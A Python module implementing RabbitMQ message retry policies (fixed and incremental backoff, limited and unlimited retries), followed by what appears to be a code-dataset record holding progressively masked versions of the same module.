                envelope.message_id, delay, death_count + 1))
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
    """Constant-delay retry policy with no retry limit.

    Behaves like :class:`.UnlimitedRetriesPolicy` with a zero increment,
    so every retry waits the same :attr:`delay` seconds.

    :attr:`consumer`: consumer instance

    :attr:`delay`: retry delay in seconds

    :attr:`retry_queue_suffix`: suffix str used when naming retry queues.
    """

    def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
        # type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None
        """
        :param Consumer consumer: message consumer instance

        :param int delay: retry delay in seconds

        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        # A fixed delay is just incremental backoff that never increments.
        super(FixedDelayUnlimitedRetriesPolicy, self).__init__(
            consumer=consumer,
            initial_delay=delay,
            max_delay=delay,
            delay_incremented_by=0,
            retry_queue_suffix=retry_queue_suffix,
            **kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
    """Constant-delay retry policy with a bounded number of retries.

    Equivalent to :class:`.LimitedRetriesPolicy` with the same delay
    repeated :attr:`retries_limit` times.

    :attr:`consumer`: consumer instance

    :attr:`delay`: retry delay in seconds.

    :attr:`retries_limit`: retries limit count.

    :attr:`retry_queue_suffix`: suffix str used when naming retry queues.
    """

    def __init__(self,
                 consumer,
                 delay,
                 retries_limit,
                 retry_queue_suffix='retry',
                 **kwargs):
        # type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None
        """
        :param Consumer consumer: message consumer instance

        :param int delay: retry delay in seconds

        :param int retries_limit: retries limit count

        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        assert retries_limit > 0
        # Expand the fixed delay into an explicit per-retry delay tuple.
        super(FixedDelayLimitedRetriesPolicy, self).__init__(
            consumer=consumer,
            retry_delays=(delay,) * retries_limit,
            retry_queue_suffix=retry_queue_suffix,
            **kwargs)
|
flexible
|
{
"blob_id": "848934680253ff2950db7723b1fe82b2ae799900",
"index": 801,
"step-1": "<mask token>\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. 
Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass 
FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-2": "<mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. 
Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. 
Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of 
:class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-3": "<mask token>\n\n\nclass BaseRetryPolicy(RetryPolicy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. 
Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. 
Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of 
:class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-4": "<mask token>\n\n\nclass RetryPolicy(object):\n <mask token>\n\n def __init__(self, **kwargs):\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n self.min_retry_queue_ttl = 20 * 1000\n\n def set_original_delivery_info_header(self, envelope):\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {'consumer_tag': envelope.\n delivery_info.consumer_tag, 'delivery_tag': envelope.\n delivery_info.delivery_tag, 'redelivered': envelope.\n delivery_info.redelivered, 'exchange': envelope.\n delivery_info.exchange, 'routing_key': envelope.\n delivery_info.routing_key}\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = envelope.get_header('x-death')\n if death_header is None:\n return 0\n count = 0\n for death in death_header:\n if not 
death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(self.consumer.queue_name, self\n .retry_queue_suffix, delay_in_ms)\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n self.consumer.channel.queue_declare(callback=None, queue=\n retry_queue_name, durable=self.consumer.durable, nowait=True,\n arguments={'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms, 'x-expires': queue_ttl})\n logger.warning('Retry queue \"{}\" is created/redeclared'.format(\n retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of 
seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. 
Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. 
Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of 
:class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nNoting is perfect, errors and timeouts may happen, and when such failures happen, the\nconsumer has to decide what to do with that. By default, the consumer would reject the\nenvelope (RabbitMQ message) when a failure happens. However, errors and timeouts\nissues, unless there is a software bug, usually solved with retries. Just like the\nrouting, the consumer doesn't make the retry decision itself, the consumer delegates\nit to a retry policy. Retry policy defines how the retry is performed. Retries\nusually happens with back-offs to avoid worsening the situation by hammering other\nservices with more requests, especially if it was a timeout issue. The consumer can be\nconfigured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing\nan instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't\nreject messages, but rather, it send them to the retry policy to deal with the\nsituation by invoking :meth:`.RetryPolicy.retry` method. Based on it's implementation,\nThe retry policy decides how to do retries.\n\nThere are 4 different retry policies available:\n\n1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy\n2. :class:`.LimitedRetriesPolicy`, Limited retries policy\n3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy\n4. 
:class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy\n\nCustom retry policies can be created by implementing the base class\n:class:`.RetryPolicy`\n\"\"\"\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass RetryPolicy(object):\n \"\"\"Base class for retry policies.\n\n Subclasses MUST implement :meth:`retry` method.\n \"\"\"\n\n def __init__(self, **kwargs):\n # type: (RetryPolicy) -> None\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n # type: (RetryPolicy, Envelope) -> None\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n # type: (BaseRetryPolicy, Consumer, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. 
Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n # To avoid frequent retry queue create and destroy for low retry delays\n self.min_retry_queue_ttl = 20 * 1000 # 20 seconds\n\n def set_original_delivery_info_header(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> None\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {\n 'consumer_tag': envelope.delivery_info.consumer_tag,\n 'delivery_tag': envelope.delivery_info.delivery_tag,\n 'redelivered': envelope.delivery_info.redelivered,\n 'exchange': envelope.delivery_info.exchange,\n 'routing_key': envelope.delivery_info.routing_key\n }\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> int\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = 